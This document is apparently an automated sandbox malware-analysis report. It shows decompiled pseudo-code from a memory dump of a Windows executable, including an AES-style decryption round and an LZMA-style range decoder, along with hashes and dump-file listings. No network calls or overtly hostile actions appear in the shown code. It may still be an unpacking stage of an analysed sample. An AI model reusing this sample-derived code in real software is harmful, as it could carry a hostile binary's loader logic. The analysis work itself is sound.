						_t395 =  *(0x41ede8 + (_t406 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f1e8 + (_t188 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41f5e8 + (_t252 >> 0x18) * 4) ^  *(0x41e9e8 + (_t227 & 0x000000ff) * 4) ^  *_t166;
						 *(_t435 + 0x14) =  *(_t435 + 0x1c) >> 0x00000010 & 0x000000ff;
						_t341 =  *(0x41ede8 + (_t188 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f1e8 +  *(_t435 + 0x14) * 4) ^  *(0x41f5e8 + ( *(_t435 + 0x18) >> 0x18) * 4) ^  *(0x41e9e8 + (_t406 & 0x000000ff) * 4) ^ _t166[3];
						_t166 = _t166 - 0x20;
						 *(_t435 + 0x18) =  *(0x41ede8 + (_t341 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f1e8 + (_t268 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41f5e8 + (_t239 >> 0x18) * 4) ^  *(0x41e9e8 + (_t395 & 0x000000ff) * 4) ^ _t166[4];
						 *(_t435 + 0x1c) =  *(0x41f1e8 + (_t341 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41ede8 + (_t395 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f5e8 + (_t268 >> 0x18) * 4) ^  *(0x41e9e8 + (_t239 & 0x000000ff) * 4) ^ _t166[5];
						_t188 =  *(0x41ede8 + (_t239 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f1e8 + (_t395 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41f5e8 + (_t341 >> 0x18) * 4) ^  *(0x41e9e8 + (_t268 & 0x000000ff) * 4) ^ _t166[6];
						_t252 =  *(_t435 + 0x1c);
						_t227 =  *(_t435 + 0x18);
						_t406 =  *(0x41ede8 + (_t268 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f1e8 + (_t239 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41f5e8 + (_t395 >> 0x18) * 4) ^  *(0x41e9e8 + (_t341 & 0x000000ff) * 4) ^ _t166[7];
						_t137 = _t435 + 0x10;
						 *_t137 =  *((intOrPtr*)(_t435 + 0x10)) - 1;
					} while ( *_t137 != 0);
				}
				 *( *(_t435 + 0x3c)) = ((( *((_t188 >> 0x00000010 & 0x000000ff) + 0x41e8e8) & 0x000000ff | ( *((_t252 >> 0x18) + 0x41e8e8) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t406 >> 0x00000008 & 0x000000ff) + 0x41e8e8) & 0x000000ff) << 0x00000008 |  *((_t227 & 0x000000ff) + 0x41e8e8) & 0x000000ff) ^  *_t166;
				( *(_t435 + 0x3c))[1] = ((( *((_t406 >> 0x00000010 & 0x000000ff) + 0x41e8e8) & 0x000000ff | ( *((_t188 >> 0x18) + 0x41e8e8) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t227 >> 0x00000008 & 0x000000ff) + 0x41e8e8) & 0x000000ff) << 0x00000008 |  *((_t252 & 0x000000ff) + 0x41e8e8) & 0x000000ff) ^ _t166[1];
				_t386 =  *(_t435 + 0x3c);
				_t386[2] = ((( *((_t227 >> 0x00000010 & 0x000000ff) + 0x41e8e8) & 0x000000ff | ( *((_t406 >> 0x18) + 0x41e8e8) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t252 >> 0x00000008 & 0x000000ff) + 0x41e8e8) & 0x000000ff) << 0x00000008 |  *((_t188 & 0x000000ff) + 0x41e8e8) & 0x000000ff) ^ _t166[2];
				_t386[3] = ((( *((_t252 >> 0x00000010 & 0x000000ff) + 0x41e8e8) & 0x000000ff | ( *((_t227 >> 0x18) + 0x41e8e8) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t188 >> 0x00000008 & 0x000000ff) + 0x41e8e8) & 0x000000ff) << 0x00000008 |  *((_t406 & 0x000000ff) + 0x41e8e8) & 0x000000ff) ^ _t166[3];
				return _t166;
			}

0x0040ab93
0x0040ab96
0x0040ab9d
0x0040aba4
0x0040abab
0x0040abb2
0x0040abb8
0x0040abf9
0x0040ac3f
0x0040ac53
0x0040ac56
0x0040aca8
0x0040acc5
0x0040acc8
0x0040accb
0x0040accb
0x0040accf
0x0040acd3
0x0040acd7
0x0040ace0
0x0040ad33
0x0040ada7
0x0040adb3
0x0040adbf
0x0040adc1
0x0040adf4
0x0040ae34
0x0040ae3c
0x0040ae85
0x0040aec6
0x0040aed6
0x0040aeea
0x0040af05
0x0040af08
0x0040af08
0x0040af08
0x0040ace0
0x0040af66
0x0040afbd
0x0040b011
0x0040b01b
0x0040b062
0x0040b06b

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 706e5b4506d8222bb72eb308eb64e6cbdea08e03554b22f290625d72daa28f67
Instruction ID: e5af3abd718cb8d35efe5b30076fc92d9bf9506f9c82f42336529bb75e4d056e
Opcode Fuzzy Hash: 706e5b4506d8222bb72eb308eb64e6cbdea08e03554b22f290625d72daa28f67
Instruction Fuzzy Hash: AED1E03BA146674FE350DF5DDC84262B7A2EF88310F4E8279DE541B253C634EA12DB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBB8, Relevance: .2, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0040EBB8(unsigned int __eax, void* __ebx, signed int __edx, signed int __esi) {
				unsigned int _t502;
				unsigned int _t503;
				unsigned int _t504;
				unsigned int _t505;
				unsigned int _t506;
				unsigned int _t507;
				unsigned int _t508;
				unsigned int _t509;
				unsigned int _t516;
				unsigned int _t517;
				unsigned int _t518;
				unsigned int _t519;
				unsigned int _t520;
				unsigned int _t525;
				unsigned int _t526;
				unsigned int _t527;
				unsigned int _t528;
				unsigned int _t529;
				unsigned int _t530;
				unsigned int _t531;
				unsigned int _t532;
				unsigned int _t533;
				unsigned int _t534;
				unsigned int _t535;
				unsigned int _t536;
				unsigned int _t537;
				unsigned int _t538;
				unsigned int _t539;
				unsigned int _t540;
				unsigned int _t541;
				unsigned int _t542;
				unsigned int _t543;
				unsigned int _t544;
				unsigned int _t545;
				unsigned int _t546;
				unsigned int _t547;
				unsigned int _t548;
				unsigned int _t549;
				signed int _t552;
				signed char* _t553;
				signed int _t554;
				signed int _t555;
				intOrPtr _t562;
				void* _t563;
				signed int _t565;
				signed int _t567;
				signed int _t577;
				unsigned int _t581;
				signed int _t584;
				signed short* _t587;
				unsigned int _t588;
				signed int _t591;
				signed short* _t594;
				unsigned int _t595;
				signed int _t598;
				signed short* _t601;
				unsigned int _t602;
				signed int _t605;
				signed short* _t608;
				unsigned int _t609;
				signed int _t612;
				signed short* _t615;
				unsigned int _t616;
				signed int _t619;
				signed short* _t622;
				unsigned int _t623;
				unsigned int _t648;
				unsigned int _t651;
				signed int _t655;
				unsigned int _t658;
				unsigned int _t660;
				signed int _t662;
				signed int _t667;
				signed int _t672;
				unsigned int _t675;
				void* _t679;
				intOrPtr _t681;
				void* _t684;
				signed int _t685;
				void* _t687;
				signed int _t690;
				signed char _t695;
				void* _t696;
				unsigned int _t697;
				signed int _t699;
				unsigned int _t700;
				unsigned int _t702;
				unsigned int _t704;
				unsigned int _t710;
				unsigned int _t721;
				signed int _t724;
				unsigned int _t725;
				signed char* _t732;
				signed char* _t734;
				unsigned int _t738;
				signed int _t741;
				unsigned int _t742;
				signed char* _t749;
				signed char* _t751;
				unsigned int _t755;
				signed int _t761;
				signed int _t762;
				signed int _t770;
				signed int _t774;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				unsigned int _t788;
				unsigned int _t793;
				signed int _t795;
				unsigned int _t796;
				unsigned int _t798;
				unsigned int _t800;
				unsigned int _t802;
				unsigned int _t804;
				unsigned int _t806;
				unsigned int _t808;
				signed int _t812;
				signed int _t814;
				unsigned int _t817;
				unsigned int _t820;
				unsigned int _t824;
				unsigned int _t829;
				signed short* _t836;
				signed char* _t840;
				char* _t847;
				unsigned int _t849;
				signed int _t851;
				unsigned int _t852;
				unsigned int _t854;
				unsigned int _t856;
				unsigned int _t858;
				unsigned int _t860;
				signed int _t865;
				signed int _t868;
				unsigned int _t873;
				unsigned int _t878;
				unsigned int _t883;
				unsigned int _t888;
				signed char* _t913;
				unsigned int _t916;
				void* _t918;
				void* _t919;
				unsigned int _t936;
				intOrPtr _t940;
				signed char* _t941;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t961;
				unsigned int _t964;
				signed int _t967;
				signed int _t973;
				signed char* _t975;
				signed int _t977;
				unsigned int _t980;
				unsigned int _t985;
				unsigned int _t990;
				unsigned int _t995;
				unsigned int _t1000;
				unsigned int _t1005;
				unsigned int _t1010;
				unsigned int _t1015;
				signed int _t1018;
				signed int _t1024;
				signed int _t1062;
				unsigned int _t1063;
				unsigned int _t1065;
				signed int _t1069;
				void* _t1074;
				unsigned int _t1079;
				unsigned int _t1084;
				unsigned int _t1089;
				unsigned int _t1094;
				unsigned int _t1099;
				unsigned int _t1104;
				signed char* _t1109;
				void* _t1110;
				signed int _t1111;
				signed int _t1113;
				unsigned int _t1148;
				unsigned int _t1152;
				unsigned int _t1157;
				unsigned int _t1170;
				unsigned int _t1174;
				unsigned int _t1179;
				signed char* _t1186;
				signed char* _t1192;
				intOrPtr _t1198;
				signed short* _t1199;
				void* _t1207;
				short* _t1208;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				unsigned int _t1225;
				signed int _t1269;
				intOrPtr _t1272;
				signed int _t1273;
				signed int _t1274;
				void* _t1275;
				signed int _t1276;
				void* _t1277;
				intOrPtr _t1280;
				void* _t1284;
				void* _t1285;
				void* _t1286;
				void* _t1287;
				void* _t1288;
				void* _t1289;
				signed int _t1290;
				signed int _t1294;
				signed int _t1295;
				void* _t1300;
				void* _t1306;
				void* _t1307;
				unsigned int _t1317;
				signed int _t1320;
				unsigned int _t1323;
				signed int _t1328;
				unsigned int _t1331;
				signed int _t1336;
				unsigned int _t1339;
				signed int _t1344;
				unsigned int _t1347;
				signed int _t1352;
				unsigned int _t1355;
				signed int _t1360;
				unsigned int _t1363;
				void* _t1368;
				void* _t1418;
				void* _t1419;
				void* _t1420;
				void* _t1421;
				void* _t1422;
				void* _t1423;
				char _t1424;
				void* _t1426;

				_t1213 = __esi;
				_t812 = __edx;
				_t502 = __eax;
				while(1) {
					L155:
					_t1275 = _t1274 + _t1274;
					_t675 =  *(_t836 + _t1275 + 0x204) & 0x0000ffff;
					if(_t509 < 0x1000000) {
						_t509 = _t509 << 8;
						_t1213 = _t1213 << 0x00000008 |  *_t553 & 0x000000ff;
						_t553 =  &(_t553[1]);
					}
					_t1069 = (_t509 >> 0xb) * _t675;
					if(_t1213 >= _t1069) {
						_t509 = _t509 - _t1069;
						_t1213 = _t1213 - _t1069;
						_t675 = _t675 - (_t675 >> 5);
						 *(_t836 + _t1275 + 0x204) = _t675;
						_t1274 = _t1275 + 1;
					} else {
						_t509 = _t1069;
						 *(_t836 + _t1275 + 0x204) = (0x800 - _t675 >> 5) + _t675;
					}
					if(_t1274 < 0x100) {
						continue;
					}
					L161:
					 *(_t1426 + 0x10) = _t553;
					_t1276 = _t1274 - 0xf0;
					while(1) {
						_t554 =  *(_t1426 + 0x10);
						while(1) {
							L163:
							 *(_t1426 + 0x30) = _t1276;
							if( *(_t1426 + 0x20) < 0xc) {
								goto L237;
							}
							L164:
							_t685 = _t1276;
							if(_t1276 >= 4) {
								_t685 = 3;
							}
							_t687 = (_t685 << 7) +  *((intOrPtr*)(_t1426 + 0x2c)) + 0x360;
							_t849 =  *(_t687 + 2) & 0x0000ffff;
							if(_t509 < 0x1000000) {
								_t509 = _t509 << 8;
								_t1213 = _t1213 << 0x00000008 |  *_t554 & 0x000000ff;
								_t554 = _t554 + 1;
								 *(_t1426 + 0x10) = _t554;
							}
							_t1079 = (_t509 >> 0xb) * _t849;
							if(_t1213 >= _t1079) {
								_t516 = _t509 - _t1079;
								_t1213 = _t1213 - _t1079;
								 *(_t687 + 2) = _t849 - (_t849 >> 5);
								_t851 = 3;
							} else {
								_t516 = _t1079;
								 *(_t687 + 2) = (0x800 - _t849 >> 5) + _t849;
								_t851 = 2;
							}
							_t1285 = _t851 + _t851;
							_t852 =  *(_t687 + _t1285) & 0x0000ffff;
							if(_t516 < 0x1000000) {
								_t516 = _t516 << 8;
								_t1213 = _t1213 << 0x00000008 |  *_t554 & 0x000000ff;
								_t554 = _t554 + 1;
								 *(_t1426 + 0x10) = _t554;
							}
							_t1084 = (_t516 >> 0xb) * _t852;
							if(_t1213 >= _t1084) {
								_t517 = _t516 - _t1084;
								_t1213 = _t1213 - _t1084;
								 *(_t687 + _t1285) = _t852 - (_t852 >> 5);
								_t1285 = _t1285 + 1;
							} else {
								_t517 = _t1084;
								 *(_t687 + _t1285) = (0x800 - _t852 >> 5) + _t852;
							}
							_t1286 = _t1285 + _t1285;
							_t854 =  *(_t687 + _t1286) & 0x0000ffff;
							if(_t517 < 0x1000000) {
								_t517 = _t517 << 8;
								_t1213 = _t1213 << 0x00000008 |  *_t554 & 0x000000ff;
								_t554 = _t554 + 1;
								 *(_t1426 + 0x10) = _t554;
							}
							_t1089 = (_t517 >> 0xb) * _t854;
							if(_t1213 >= _t1089) {
								_t518 = _t517 - _t1089;
								_t1213 = _t1213 - _t1089;
								 *(_t687 + _t1286) = _t854 - (_t854 >> 5);
								_t1286 = _t1286 + 1;
							} else {
								_t518 = _t1089;
								 *(_t687 + _t1286) = (0x800 - _t854 >> 5) + _t854;
							}
							_t1287 = _t1286 + _t1286;
							_t856 =  *(_t687 + _t1287) & 0x0000ffff;
							if(_t518 < 0x1000000) {
								_t518 = _t518 << 8;
								_t1213 = _t1213 << 0x00000008 |  *_t554 & 0x000000ff;
								_t554 = _t554 + 1;
								 *(_t1426 + 0x10) = _t554;
							}
							_t1094 = (_t518 >> 0xb) * _t856;
							if(_t1213 >= _t1094) {
								_t519 = _t518 - _t1094;
								_t1213 = _t1213 - _t1094;
								 *(_t687 + _t1287) = _t856 - (_t856 >> 5);
								_t1287 = _t1287 + 1;
							} else {
								_t519 = _t1094;
								 *(_t687 + _t1287) = (0x800 - _t856 >> 5) + _t856;
							}
							_t1288 = _t1287 + _t1287;
							_t858 =  *(_t687 + _t1288) & 0x0000ffff;
							if(_t519 < 0x1000000) {
								_t519 = _t519 << 8;
								_t1213 = _t1213 << 0x00000008 |  *_t554 & 0x000000ff;
								_t554 = _t554 + 1;
								 *(_t1426 + 0x10) = _t554;
							}
							_t1099 = (_t519 >> 0xb) * _t858;
							if(_t1213 >= _t1099) {
								_t520 = _t519 - _t1099;
								_t1213 = _t1213 - _t1099;
								 *(_t687 + _t1288) = _t858 - (_t858 >> 5);
								_t1288 = _t1288 + 1;
							} else {
								_t520 = _t1099;
								 *(_t687 + _t1288) = (0x800 - _t858 >> 5) + _t858;
							}
							_t1289 = _t1288 + _t1288;
							_t860 =  *(_t687 + _t1289) & 0x0000ffff;
							if(_t520 < 0x1000000) {
								_t520 = _t520 << 8;
								_t1213 = _t1213 << 0x00000008 |  *_t554 & 0x000000ff;
								 *(_t1426 + 0x10) = _t554 + 1;
							}
							_t1104 = (_t520 >> 0xb) * _t860;
							if(_t1213 >= _t1104) {
								_t509 = _t520 - _t1104;
								_t1213 = _t1213 - _t1104;
								 *(_t687 + _t1289) = _t860 - (_t860 >> 5);
								_t1289 = _t1289 + 1;
							} else {
								_t509 = _t1104;
								 *(_t687 + _t1289) = (0x800 - _t860 >> 5) + _t860;
							}
							_t1290 = _t1289 - 0x40;
							if(_t1290 < 4) {
								L231:
								 *(_t1426 + 0x48) =  *(_t1426 + 0x44);
								 *(_t1426 + 0x40) =  *(_t1426 + 0x34);
								_t690 =  *(_t1426 + 0x4c);
								 *(_t1426 + 0x44) =  *(_t1426 + 0x40);
								_t439 = _t1290 + 1; // -296
								 *(_t1426 + 0x34) = _t439;
								if(_t690 != 0) {
									if(_t1290 >= _t690) {
										 *( *((intOrPtr*)(_t1426 + 0x60)) + 0x24) =  *(_t1426 + 0x24);
										return 1;
									} else {
										goto L236;
									}
								} else {
									if(_t1290 <  *(_t1426 + 0x28)) {
										L236:
										_t1276 =  *(_t1426 + 0x30);
										asm("sbb ecx, ecx");
										_t675 = (_t690 & 0xfffffffd) + 0xa;
										 *(_t1426 + 0x20) = _t675;
										goto L237;
									} else {
										 *( *((intOrPtr*)(_t1426 + 0x60)) + 0x24) =  *(_t1426 + 0x24);
										L234:
										return 1;
									}
								}
							} else {
								_t865 = _t1290;
								_t695 = (_t1290 >> 1) - 1;
								_t1294 = _t1290 & 0x00000001 | 0x00000002;
								 *(_t1426 + 0x1c) = _t695;
								if(_t865 >= 0xe) {
									_t1109 =  *(_t1426 + 0x10);
									_t696 = _t695 - 4;
									do {
										if(_t509 < 0x1000000) {
											_t509 = _t509 << 8;
											_t1213 = _t1213 << 0x00000008 |  *_t1109 & 0x000000ff;
											_t1109 =  &(_t1109[1]);
										}
										_t509 = _t509 >> 1;
										_t1225 = _t1213 - _t509;
										_t868 =  ~(_t1225 >> 0x1f);
										_t1294 = _t868 + 1 + _t1294 * 2;
										_t1213 = _t1225 + (_t868 & _t509);
										_t696 = _t696 - 1;
									} while (_t696 != 0);
									_t562 =  *((intOrPtr*)(_t1426 + 0x2c));
									_t697 =  *(_t562 + 0x646) & 0x0000ffff;
									_t1295 = _t1294 << 4;
									 *(_t1426 + 0x10) = _t1109;
									if(_t509 < 0x1000000) {
										_t913 = _t1109;
										_t509 = _t509 << 8;
										_t1213 = _t1213 << 0x00000008 |  *_t913 & 0x000000ff;
										 *(_t1426 + 0x10) =  &(_t913[1]);
									}
									_t873 = (_t509 >> 0xb) * _t697;
									if(_t1213 >= _t873) {
										_t525 = _t509 - _t873;
										_t1213 = _t1213 - _t873;
										 *(_t562 + 0x646) = _t697 - (_t697 >> 5);
										_t699 = 3;
										_t1295 = _t1295 | 0x00000001;
									} else {
										_t525 = _t873;
										 *(_t562 + 0x646) = (0x800 - _t697 >> 5) + _t697;
										_t699 = 2;
									}
									_t1110 = _t699 + _t699;
									_t700 =  *(_t1110 + _t562 + 0x644) & 0x0000ffff;
									if(_t525 < 0x1000000) {
										_t525 = _t525 << 8;
										_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
										 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
									}
									_t878 = (_t525 >> 0xb) * _t700;
									if(_t1213 >= _t878) {
										_t526 = _t525 - _t878;
										_t1213 = _t1213 - _t878;
										 *(_t1110 + _t562 + 0x644) = _t700 - (_t700 >> 5);
										_t1110 = _t1110 + 1;
										_t1295 = _t1295 | 0x00000002;
									} else {
										_t526 = _t878;
										 *(_t1110 + _t562 + 0x644) = (0x800 - _t700 >> 5) + _t700;
									}
									_t1111 = _t1110 + _t1110;
									_t702 =  *(_t1111 + _t562 + 0x644) & 0x0000ffff;
									if(_t526 < 0x1000000) {
										_t526 = _t526 << 8;
										_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
										 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
									}
									_t883 = (_t526 >> 0xb) * _t702;
									if(_t1213 >= _t883) {
										_t527 = _t526 - _t883;
										_t1213 = _t1213 - _t883;
										 *(_t1111 + _t562 + 0x644) = _t702 - (_t702 >> 5);
										_t1111 = _t1111 + 1;
										_t1295 = _t1295 | 0x00000004;
									} else {
										_t527 = _t883;
										 *(_t1111 + _t562 + 0x644) = (0x800 - _t702 >> 5) + _t702;
									}
									_t704 =  *(_t562 + 0x644 + _t1111 * 2) & 0x0000ffff;
									if(_t527 < 0x1000000) {
										_t527 = _t527 << 8;
										_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
										 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
									}
									_t888 = (_t527 >> 0xb) * _t704;
									if(_t1213 >= _t888) {
										_t509 = _t527 - _t888;
										_t1213 = _t1213 - _t888;
										 *(_t562 + 0x644 + _t1111 * 2) = _t704 - (_t704 >> 5);
										_t1290 = _t1295 | 0x00000008;
									} else {
										_t509 = _t888;
										 *(_t562 + 0x644 + _t1111 * 2) = (0x800 - _t704 >> 5) + _t704;
									}
									if(_t1290 == 0xffffffff) {
										 *(_t1426 + 0x30) =  *(_t1426 + 0x30) + 0x112;
										 *(_t1426 + 0x20) =  *(_t1426 + 0x20) - 0xc;
										L253:
										_t840 =  *(_t1426 + 0x10);
										if(_t509 < 0x1000000) {
											_t509 = _t509 << 8;
											_t1213 = _t1213 << 0x00000008 |  *_t840 & 0x000000ff;
											_t840 =  &(_t840[1]);
										}
										_t681 =  *((intOrPtr*)(_t1426 + 0x60));
										 *(_t681 + 0x1c) = _t509;
										 *(_t681 + 0x18) = _t840;
										 *(_t681 + 0x24) =  *(_t1426 + 0x24);
										 *(_t681 + 0x48) =  *(_t1426 + 0x30);
										 *(_t681 + 0x38) =  *(_t1426 + 0x34);
										 *(_t681 + 0x2c) =  *(_t1426 + 0x28);
										 *(_t681 + 0x20) = _t1213;
										 *(_t681 + 0x40) =  *(_t1426 + 0x44);
										 *(_t681 + 0x3c) =  *(_t1426 + 0x3c);
										 *(_t681 + 0x34) =  *(_t1426 + 0x1c);
										 *(_t681 + 0x44) =  *(_t1426 + 0x40);
										return 0;
									} else {
										goto L231;
									}
								} else {
									_t1290 = _t1294 << _t695;
									_t1113 = 1;
									 *(_t1426 + 0x48) = 1;
									_t563 =  *((intOrPtr*)(_t1426 + 0x2c)) + 0x55e + (_t1290 - _t865) * 2;
									do {
										_t916 =  *(_t563 + _t1113 * 2) & 0x0000ffff;
										if(_t509 < 0x1000000) {
											_t509 = _t509 << 8;
											_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
											 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
										}
										_t710 = (_t509 >> 0xb) * _t916;
										if(_t1213 >= _t710) {
											_t509 = _t509 - _t710;
											_t1213 = _t1213 - _t710;
											_t1290 = _t1290 |  *(_t1426 + 0x48);
											 *(_t563 + _t1113 * 2) = _t916 - (_t916 >> 5);
											_t1113 = _t1113 + _t1113 + 1;
										} else {
											_t509 = _t710;
											 *(_t563 + _t1113 * 2) = (0x800 - _t916 >> 5) + _t916;
											_t1113 = _t1113 + _t1113;
										}
										 *(_t1426 + 0x48) =  *(_t1426 + 0x48) << 1;
										_t389 = _t1426 + 0x1c;
										 *_t389 =  *(_t1426 + 0x1c) - 1;
									} while ( *_t389 != 0);
									goto L231;
								}
							}
							L258:
							L237:
							_t555 =  *(_t1426 + 0x24);
							_t1277 = _t1276 + 2;
							_t1074 =  *((intOrPtr*)(_t1426 + 0x64)) - _t555;
							if(_t1074 == 0) {
								 *( *((intOrPtr*)(_t1426 + 0x60)) + 0x24) = _t555;
								return 1;
							} else {
								if(_t1074 >= _t1277) {
									_t1074 = _t1277;
								}
								asm("sbb ecx, ecx");
								 *(_t1426 + 0x28) =  *(_t1426 + 0x28) + _t1074;
								_t679 = (_t675 &  *(_t1426 + 0x3c)) -  *(_t1426 + 0x34) + _t555;
								 *(_t1426 + 0x30) = _t1277 - _t1074;
								if(_t1074 >  *(_t1426 + 0x3c) - _t679) {
									_t1280 =  *((intOrPtr*)(_t1426 + 0x38));
									do {
										 *((char*)(_t555 + _t1280)) =  *((intOrPtr*)(_t679 + _t1280));
										_t679 = _t679 + 1;
										_t555 = _t555 + 1;
										if(_t679 ==  *(_t1426 + 0x3c)) {
											_t679 = 0;
										}
										_t1074 = _t1074 - 1;
									} while (_t1074 != 0);
									 *(_t1426 + 0x24) = _t555;
								} else {
									_t847 =  *((intOrPtr*)(_t1426 + 0x38)) + _t555;
									_t1284 = _t679 - _t555;
									_t684 = _t847 + _t1074;
									 *(_t1426 + 0x24) = _t555 + _t1074;
									do {
										 *_t847 =  *((intOrPtr*)(_t847 + _t1284));
										_t847 = _t847 + 1;
									} while (_t847 != _t684);
									L249:
									while( *(_t1426 + 0x24) <  *((intOrPtr*)(_t1426 + 0x64)) &&  *(_t1426 + 0x10) <  *((intOrPtr*)(_t1426 + 0x68))) {
										_t1062 =  *(_t1426 + 0x20);
										_t812 =  *(_t1426 + 0x58);
										_t552 =  *(_t1426 + 0x28) & _t812;
										_t814 =  *((intOrPtr*)(_t1426 + 0x2c)) + ((_t1062 << 4) + _t552) * 2;
										_t648 =  *_t814 & 0x0000ffff;
										if(_t502 < 0x1000000) {
											_t502 = _t502 << 8;
											_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
											 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
										}
										_t1269 = (_t502 >> 0xb) * _t648;
										if(_t1213 >= _t1269) {
											_t503 = _t502 - _t1269;
											_t1214 = _t1213 - _t1269;
											 *_t814 = _t648 - (_t648 >> 5);
											_t651 =  *( *((intOrPtr*)(_t1426 + 0x2c)) + 0x180 + _t1062 * 2) & 0x0000ffff;
											if(_t503 < 0x1000000) {
												_t941 =  *(_t1426 + 0x10);
												_t503 = _t503 << 8;
												_t1214 = _t1214 << 0x00000008 |  *_t941 & 0x000000ff;
												 *(_t1426 + 0x10) =  &(_t941[1]);
											}
											_t817 = (_t503 >> 0xb) * _t651;
											if(_t1214 >= _t817) {
												_t1272 =  *((intOrPtr*)(_t1426 + 0x2c));
												_t504 = _t503 - _t817;
												_t1213 = _t1214 - _t817;
												 *((short*)(_t1272 + 0x180 + _t1062 * 2)) = _t651 - (_t651 >> 5);
												if( *(_t1426 + 0x4c) != 0 ||  *(_t1426 + 0x28) != 0) {
													_t820 =  *(_t1272 + 0x198 + _t1062 * 2) & 0x0000ffff;
													if(_t504 < 0x1000000) {
														_t504 = _t504 << 8;
														_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
														 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
													}
													_t655 = (_t504 >> 0xb) * _t820;
													if(_t1213 >= _t655) {
														_t505 = _t504 - _t655;
														_t1215 = _t1213 - _t655;
														 *(_t1272 + 0x198 + _t1062 * 2) = _t820 - (_t820 >> 5);
														_t658 =  *(_t1272 + 0x1b0 + _t1062 * 2) & 0x0000ffff;
														if(_t505 < 0x1000000) {
															_t505 = _t505 << 8;
															_t1215 = _t1215 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
															 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
														}
														_t824 = (_t505 >> 0xb) * _t658;
														if(_t1215 >= _t824) {
															_t506 = _t505 - _t824;
															_t1216 = _t1215 - _t824;
															 *(_t1272 + 0x1b0 + _t1062 * 2) = _t658 - (_t658 >> 5);
															_t660 =  *(_t1272 + 0x1c8 + _t1062 * 2) & 0x0000ffff;
															if(_t506 < 0x1000000) {
																_t506 = _t506 << 8;
																_t1216 = _t1216 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
																 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
															}
															_t829 = (_t506 >> 0xb) * _t660;
															if(_t1216 >= _t829) {
																_t507 = _t506 - _t829;
																_t1216 = _t1216 - _t829;
																 *(_t1272 + 0x1c8 + _t1062 * 2) = _t660 - (_t660 >> 5);
																_t662 =  *(_t1426 + 0x48);
																 *(_t1426 + 0x48) =  *(_t1426 + 0x44);
															} else {
																_t507 = _t829;
																_t662 =  *(_t1426 + 0x44);
																 *(_t1272 + 0x1c8 + _t1062 * 2) = (0x800 - _t660 >> 5) + _t660;
															}
															 *(_t1426 + 0x44) =  *(_t1426 + 0x40);
														} else {
															_t507 = _t824;
															_t662 =  *(_t1426 + 0x40);
															 *(_t1272 + 0x1b0 + _t1062 * 2) = (0x800 - _t658 >> 5) + _t658;
														}
														_t1273 =  *(_t1426 + 0x20);
														 *(_t1426 + 0x40) =  *(_t1426 + 0x34);
														 *(_t1426 + 0x34) = _t662;
														goto L117;
													} else {
														_t1198 = _t1272;
														_t1273 =  *(_t1426 + 0x20);
														 *((short*)(_t1198 + 0x198 + _t1273 * 2)) = (0x800 - _t820 >> 5) + _t820;
														_t1199 = _t1198 + ((_t1273 + 0xf << 4) + _t552) * 2;
														_t936 =  *_t1199 & 0x0000ffff;
														_t534 = _t655;
														if(_t655 < 0x1000000) {
															_t534 = _t655 << 8;
															_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
															 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
														}
														_t755 = (_t534 >> 0xb) * _t936;
														if(_t1213 >= _t755) {
															_t507 = _t534 - _t755;
															_t1216 = _t1213 - _t755;
															_t662 = _t936 >> 5;
															 *_t1199 = _t936 - _t662;
															L117:
															asm("sbb ecx, ecx");
															 *(_t1426 + 0x20) = (_t662 & 0xfffffffd) + 0xb;
															_t836 =  *((intOrPtr*)(_t1426 + 0x2c)) + 0xa68;
															goto L118;
														} else {
															_t509 = _t755;
